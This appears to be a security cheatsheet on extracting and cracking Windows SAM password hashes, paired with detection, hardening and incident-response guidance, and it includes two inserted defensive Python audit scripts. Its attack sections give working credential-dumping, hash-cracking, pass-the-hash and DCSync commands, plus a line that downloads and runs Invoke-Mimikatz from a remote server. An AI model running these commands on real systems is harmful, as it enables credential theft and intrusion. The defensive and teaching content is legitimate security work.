===============================================================================
LOCALSAM DUMP SECURITY CHEATSHEET
JOHLEM.net IT SECURITY CHEATSHEETS
===============================================================================

--- WHAT IS LOCALSAM DUMP ---

LocalSamDump is a password hash extraction technique targeting the Windows SAM
(Security Account Manager) database. The SAM stores local user account
passwords as hashes and is a critical component of Windows authentication.

Location: C:\Windows\System32\config\SAM
Purpose:  Contains local user account password hashes (NTLM/LM)
Access:   Requires administrative privileges or SYSTEM access

--- SAM DATABASE BASICS ---

SAM File Structure:
- Stored in registry hive format
- Contains user account information (RID, username, password hash)
- Protected by SYSKEY encryption (the boot key is derived from the SYSTEM hive,
  which is why SAM and SYSTEM are always collected together)
- Locked when Windows is running (requires offline access or special tools)

Hash Types:
LM Hash   - Legacy, weak (disabled by default in modern Windows)
NTLM Hash - MD4 hash of the UTF-16LE (Unicode) password, unsalted
NTLMv2    - Challenge-response protocol (not stored in SAM)

--- EXTRACTION METHODS ---

## Method 1: Registry Extraction (Administrative Access)
reg save HKLM\SAM C:\temp\sam.hive
reg save HKLM\SYSTEM C:\temp\system.hive
reg save HKLM\SECURITY C:\temp\security.hive

## Method 2: Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\

## Method 3: Offline Boot (Linux/WinPE)
- Boot from external media
- Mount Windows drive
- Copy SAM/SYSTEM files directly

## Method 4: Memory Dump Analysis
- Extract from crash dumps
- Live memory acquisition
- Hibernation file analysis

--- TOOLS FOR EXTRACTION ---

## PWDumpX
pwdumpx -h                                     # Help
pwdumpx -o output.txt                          # Dump to file
pwdumpx -s                                     # Include SIDs

## SAMdump2 (Linux)
samdump2 system.hive sam.hive                  # Basic extraction
samdump2 -o output.txt system.hive sam.hive    # Output to file

## Ophcrack
ophcrack -t tables -d directory -f sam.txt     # Crack with rainbow tables
ophcrack -g                                    # GUI mode

## John the Ripper
john --format=NT hashes.txt                    # Crack NTLM hashes
john --wordlist=rockyou.txt hashes.txt         # Dictionary attack
john --show hashes.txt                         # Show cracked passwords

## Hashcat
hashcat -m 1000 hashes.txt rockyou.txt         # NTLM cracking
hashcat -m 3000 hashes.txt rockyou.txt         # LM cracking
hashcat -a 3 -m 1000 hashes.txt ?a?a?a?a?a?a   # Brute force

## Mimikatz
privilege::debug                               # Enable debug privilege
token::elevate                                 # Elevate to SYSTEM
lsadump::sam                                   # Dump SAM database
lsadump::secrets                               # Dump LSA secrets

## CrackMapExec
crackmapexec smb target -u user -p pass --sam  # Remote SAM dump
crackmapexec smb target -u user -H hash --sam  # Pass-the-hash + SAM

--- POWERSHELL EXTRACTION ---

## Registry Method
# HKLM\SAM is readable only by SYSTEM by default; run as Administrator these
# return "Requested registry access is not allowed" unless elevated to SYSTEM
$sam = Get-ItemProperty -Path "HKLM:\SAM\SAM\Domains\Account\Users\*"
$system = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"

## Using Invoke-Mimikatz
IEX (New-Object Net.WebClient).DownloadString('http://server/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

## Manual Registry Dump
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# The saved hives are binary; parse them with samdump2 or secretsdump. Re-encoding
# the hive as ASCII text (below) produces an unusable file
# Get-Content sam.hive | Out-File -Encoding ASCII sam.txt

--- HASH FORMATS ---

## NTLM Hash Format
username:RID:LMhash:NTLMhash:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

## PWDump Format
username:userid:LMhash:NTLMhash:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

## John the Ripper Format
$NT$hash
$LM$hash

## Hashcat Format
hash
user:hash

--- CRACKING TECHNIQUES ---

## Dictionary Attack
john --wordlist=passwords.txt hashes.txt
hashcat -a 0 -m 1000 hashes.txt wordlist.txt

## Brute Force
john --incremental hashes.txt
hashcat -a 3 -m 1000 hashes.txt ?a?a?a?a?a?a?a?a

## Hybrid Attack
hashcat -a 6 -m 1000 hashes.txt wordlist.txt ?d?d?d?d    # wordlist + mask
hashcat -a 7 -m 1000 hashes.txt ?d?d?d?d wordlist.txt    # mask + wordlist

## Rainbow Tables
ophcrack -t tables -f hashes.txt
rcrack tables -f hashes.txt

## Rule-Based Attack
john --rules=best64 --wordlist=rockyou.txt hashes.txt
hashcat -a 0 -r rules/best64.rule -m 1000 hashes.txt rockyou.txt

--- DEFENSE TECHNIQUES ---

## Detection Methods
- Monitor registry access to the SAM hive
- Log unusual processes accessing lsass.exe
- Detect offline boot attempts
- Monitor VSS (Volume Shadow Copy) usage
- Alert on mimikatz/credential dumping signatures

## Registry Monitoring
# Event 4656 (handle requested) is only logged for a registry key when Object
# Access auditing is enabled and the key carries a SACL
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} |
    Where-Object {$_.Message -match "SAM"}

## Process Monitoring
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} |
    Where-Object {$_.Message -match "lsass"}

## File System Monitoring
# NTFS last-access timestamps are often not updated; treat this as a weak
# signal and prefer event-based auditing
Get-ChildItem -Path "C:\Windows\System32\config" |
    Where-Object {$_.LastAccessTime -gt (Get-Date).AddMinutes(-10)}

--- PREVENTION STRATEGIES ---

## Strong Password Policy
- Minimum 12 characters
- Complexity requirements
- Regular password changes
- Account lockout policies

## System Hardening
Disable LM hash storage:
  NoLMHash = 1 (Registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
Enable Additional LSA Protection:
  RunAsPPL = 1 (Registry: HKLM\SYSTEM\CurrentControlSet\Control\Lsa)
Disable WDigest:
  UseLogonCredential = 0 (Registry: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest)

## Access Controls
- Limit administrative access
- Use the principle of least privilege
- Monitor privileged account usage
- Implement LAPS for local admin passwords

--- INCIDENT RESPONSE ---

## Indicators of Compromise
- Unexpected SAM file access
- Registry hive exports
- Unusual lsass.exe process access
- Volume shadow copy creation
- Presence of credential dumping tools

## Investigation Steps
1. Identify affected systems
2. Collect memory dumps
3. Analyze event logs
4. Check for lateral movement
5. Reset compromised accounts
6. Implement additional monitoring
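Event-log triage for the two Detection Methods signals above (event 4656 handle requests against the SAM hive key and against lsass.exe), as an added example that is not part of this cheatsheet. It assumes events exported with `wevtutil qe Security /f:xml`; the sample records are constructed and the lsass process allowlist is an assumption to tune per host.

```python
"""Triage exported Security events for the two handle-request signals listed under
Detection Methods: event 4656 against the SAM hive key and against lsass.exe."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Processes expected to hold lsass.exe handles; anything else is flagged (assumption, tune per host)
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

def parse_event(event_xml):
    """Return (EventID, {Data Name: value}) from one <Event> element as exported by wevtutil."""
    root = ET.fromstring(event_xml)
    eid = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return eid, data

def triage_4656(event_xml):
    """Return 'sam_hive', 'lsass_handle', or None for one event. 4656 is only emitted for a
    registry key when Object Access auditing is on and the SAM key carries a SACL."""
    eid, d = parse_event(event_xml)
    if eid != 4656:
        return None
    obj, proc = d.get("ObjectName", "").lower(), d.get("ProcessName", "").lower()
    if d.get("ObjectType") == "Key" and "\\registry\\machine\\sam" in obj:
        return "sam_hive"
    if d.get("ObjectType") == "Process" and obj.endswith("\\lsass.exe") and proc not in LSASS_ALLOWLIST:
        return "lsass_handle"
    return None

def scan(events):
    """Return [(user, process, verdict)] for every event that triages as suspicious."""
    parsed = [(parse_event(ev)[1], triage_4656(ev)) for ev in events]
    return [(d["SubjectUserName"], d["ProcessName"], v) for d, v in parsed if v]

def make_event(eid, user, obj_type, obj_name, proc):
    """Build a constructed sample record in the exported-XML layout (test data, not a real log)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID></System><EventData>'
            f'<Data Name="SubjectUserName">{user}</Data><Data Name="ObjectType">{obj_type}</Data>'
            f'<Data Name="ObjectName">{obj_name}</Data><Data Name="ProcessName">{proc}</Data>'
            '</EventData></Event>')

SAMPLE = [  # constructed: reg.exe opening the SAM key, a benign csrss handle, an unknown dumper, an unrelated 4663
    make_event(4656, "jdoe", "Key", r"\REGISTRY\MACHINE\SAM\SAM\Domains\Account\Users", r"C:\Windows\System32\reg.exe"),
    make_event(4656, "SYSTEM", "Process", r"\Device\HarddiskVolume2\Windows\System32\lsass.exe", r"C:\Windows\System32\csrss.exe"),
    make_event(4656, "jdoe", "Process", r"\Device\HarddiskVolume2\Windows\System32\lsass.exe", r"C:\Users\jdoe\Downloads\dumper.exe"),
    make_event(4663, "jdoe", "Key", r"\REGISTRY\MACHINE\SOFTWARE\Example", r"C:\Windows\regedit.exe"),
]
```

Running `scan(SAMPLE)` returns the reg.exe SAM-key request and the unknown process touching lsass.exe, and ignores the csrss.exe handle and the unrelated 4663 event.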
## Forensic Collection
Get-Process lsass | Select-Object Id, ProcessName, StartTime
Get-WinEvent -LogName Security |
    Where-Object {$_.Id -eq 4656 -and $_.Message -match "SAM"}
Get-ChildItem -Path "C:\Windows\System32\config" -Force |
    Select-Object Name, LastWriteTime, LastAccessTime

--- REMEDIATION ACTIONS ---

## Immediate Response
1. Isolate affected systems
2. Change all local admin passwords
3. Reset service account passwords
4. Check for persistence mechanisms
5. Scan for additional malware

## Password Reset Script
# Resets every enabled local account (including the one running the script) and
# prints the new passwords to the console; capture that output somewhere protected,
# or let LAPS manage the local administrator instead
$users = Get-LocalUser | Where-Object {$_.Enabled -eq $true}
foreach ($user in $users) {
    $newPassword = -join ((33..126) | Get-Random -Count 15 | ForEach-Object {[char]$_})
    $securePassword = ConvertTo-SecureString $newPassword -AsPlainText -Force
    Set-LocalUser -Name $user.Name -Password $securePassword
    Write-Output "$($user.Name): $newPassword"
}

## LAPS Deployment
Install-WindowsFeature RSAT-Feature-Tools-GP-LGPO
Import-Module AdmPwd.PS
Update-AdmPwdADSchema
Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Computers,DC=domain,DC=com"

--- ADVANCED PROTECTION ---

## Credential Guard
Enable Windows Defender Credential Guard:
- Virtualization-based security
- Protects LSA secrets
- Prevents credential dumping

## LSASS Protection
RunAsPPL (Protected Process Light):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1

## Audit Policies
auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable

--- POWERSHELL DETECTION ---

## Suspicious Activity Detection
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
    Where-Object {$_.Message -match "(SAM|lsass|mimikatz|sekurlsa|lsadump)"}

## Registry Access Monitoring
# RegistryKeyChangeEvent fires on key modifications, not on reads; reads of the
# SAM are only visible through SACL-based object access auditing (event 4656)
$RegAction = {
    $NewEvent = $Event.SourceEventArgs.NewEvent
    if ($NewEvent.KeyPath -match "SAM|LSA") {
        Write-Warning "Suspicious registry access: $($NewEvent.KeyPath)"
    }
}
Register-WmiEvent -Query "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='HKEY_LOCAL_MACHINE' AND KeyPath LIKE '%SAM%'" -Action $RegAction

--- HASH ANALYSIS ---

## Common Weak Hashes
31d6cfe0d16ae931b73c59d7e0c089c0    # Empty password
aad3b435b51404eeaad3b435b51404ee    # Empty LM hash
c74761604a24a0dfd0c7cce7b0ba1b82    # Password "password"
209c6174da490caeb422f3fa5a7ae634    # Password "123456"

## Hash Identification
function Test-HashType {
    param($Hash)
    switch ($Hash.Length) {
        32      { "NTLM/MD4/MD5" }
        40      { "SHA-1" }
        64      { "SHA-256" }
        default { "Unknown" }
    }
}

## Bulk Hash Analysis
$hashes = Get-Content "hashes.txt"
foreach ($hash in $hashes) {
    $type = Test-HashType $hash.Split(':')[3]
    Write-Output "$hash - Type: $type"
}

--- NETWORK-BASED ATTACKS ---

## Remote SAM Extraction
impacket-secretsdump domain/user:pass@target
impacket-secretsdump -hashes lm:nt domain/user@target

## DCSync Attack (Domain)
mimikatz "lsadump::dcsync /domain:company.com /user:Administrator"

## Pass-the-Hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 user@target

--- USEFUL FUNCTIONS ---

## Extract RID from Hash File
function Get-RIDFromHash {
    param($HashFile)
    Get-Content $HashFile | ForEach-Object {
        $parts = $_ -split ':'
        Write-Output "User: $($parts[0]), RID: $($parts[1])"
    }
}

## Check for Weak Passwords
function Test-WeakHashes {
    param($HashFile)
    $weakHashes = @(
        "31d6cfe0d16ae931b73c59d7e0c089c0",  # Empty
        "aad3b435b51404eeaad3b435b51404ee"   # Empty LM
    )
    Get-Content $HashFile | ForEach-Object {
        $hash = ($_ -split ':')[3]
        if ($hash -in $weakHashes) {
            Write-Warning "Weak hash found: $_"
        }
    }
}

## Generate Hash Statistics
function Get-HashStats {
    param($HashFile)
    $hashes = Get-Content $HashFile
    Write-Output "Total accounts: $($hashes.Count)"
    Write-Output "Unique NTLM hashes: $(($hashes | ForEach-Object {($_ -split ':')[3]} | Sort-Object -Unique).Count)"
    Write-Output "Empty passwords: $(($hashes | Where-Object {($_ -split ':')[3] -eq '31d6cfe0d16ae931b73c59d7e0c089c0'}).Count)"
}
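A standalone audit of a dump in the pwdump format shown under HASH FORMATS, as an added example that is not part of this cheatsheet: it extends the Test-WeakHashes and Get-HashStats ideas above with a check for LM hashes still being stored (NoLMHash not enforced) and for one NT hash reused across several accounts. The sample dump lines are constructed.

```python
"""Audit a pwdump-format hash file (user:RID:LMhash:NThash:::) for the weaknesses a
defender acts on: empty NT hashes, LM hashes still stored (NoLMHash not enforced) and
one NT hash shared by several accounts (password reuse across local accounts)."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
HEX = set("0123456789abcdef")

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) per well-formed line; blanks, comments and junk are skipped."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit() or line.lstrip().startswith("#"):
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit(text):
    """Return {'empty_nt': [users], 'lm_stored': [users], 'shared_nt': {nt: [users]}}."""
    findings = {"empty_nt": [], "lm_stored": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in parse_pwdump(text):
        # pwdump writes "NO PASSWORD***..." for accounts that have no password set
        if nt == EMPTY_NT or nt.startswith("no password"):
            findings["empty_nt"].append(user)
            continue
        # a real 32-hex LM value other than the empty marker means LM hashes are being stored
        if len(lm) == 32 and lm != EMPTY_LM and set(lm) <= HEX:
            findings["lm_stored"].append(user)
        by_nt[nt].append(user)
    findings["shared_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings

# constructed sample dump (not real accounts); every hash here is synthetic except the empty markers
SAMPLE = """# pwdump export, constructed for this example
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacyapp:1003:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for kind, hit in audit(SAMPLE).items():
        print(f"{kind}: {hit}")
```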
--- LEGAL CONSIDERATIONS ---

⚠️ WARNING: SAM dumping techniques should only be used:
- On systems you own or have explicit authorization to test
- During authorized penetration testing engagements
- For legitimate security research
- In controlled lab environments

Unauthorized access to password hashes may violate:
- Computer Fraud and Abuse Act (CFAA) in the US
- Computer Misuse Act in the UK
- Similar cybercrime laws in other jurisdictions

--- MITIGATION SUMMARY ---

1. Implement strong password policies
2. Enable Credential Guard where possible
3. Use LAPS for local administrator accounts
4. Monitor for suspicious registry/file access
5. Disable legacy authentication methods
6. Implement proper access controls
7. Regular security awareness training
8. Deploy endpoint detection and response (EDR)
9. Network segmentation
10. Principle of least privilege

===============================================================================
Pro Tips:
- Always use authorized testing environments
- Document all testing activities
- Keep tools and techniques updated
- Understand legal implications
- Focus on defense and detection
- Regular password audits help identify weak credentials

More resources: JOHLEM.net
===============================================================================